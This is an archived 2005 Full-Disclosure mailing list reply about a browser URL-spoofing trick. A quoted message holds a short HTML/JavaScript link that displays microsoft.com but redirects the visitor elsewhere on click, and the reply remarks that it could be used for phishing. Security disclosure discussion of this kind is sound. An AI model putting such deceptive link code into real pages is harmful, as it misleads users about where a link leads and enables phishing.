[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)

To: Jake Cole <jakecoleus@xxxxxxxxx>
Subject: Re: [Full-disclosure] New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)
From: Bipin Gautam <gautam.bipin@xxxxxxxxx>
Date: Sat, 22 Oct 2005 00:06:28 +0545

On 10/21/05, Jake Cole <jakecoleus@xxxxxxxxx> wrote:
> In "Billy's" defense, this is expected in most
> JavaScript-enabled browsers.
>
> Here's a Firefox version:
>
> <a href="http://microsoft.com";
> onClick="window.setTimeout('document.write(unescape(\'%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e\'))')">Microsoft</a>
>


I really don't know what to EXACTLY call it... yap it can be used in
PISHING; cauz a few weeks back I was thinking this  EXACT same thing.
GOT the idea from 'http://vmyths.com/' ither is a page(news pade i
guess) there its sectioned and two different websites are displayed.
(O;
--

Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- Re: [Full-disclosure] New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)
  - From: Jake Cole

Prev by Date: Re: [Full-disclosure] New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)
Next by Date: Re: [Full-disclosure] New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)
Previous by thread: Re: [Full-disclosure] New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)
Next by thread: [Full-disclosure] iDEFENSE Security Advisory 10.20.05: Multiple Vendor Ethereal srvloc Buffer Overflow Vulnerability
Index(es):
- Date
- Thread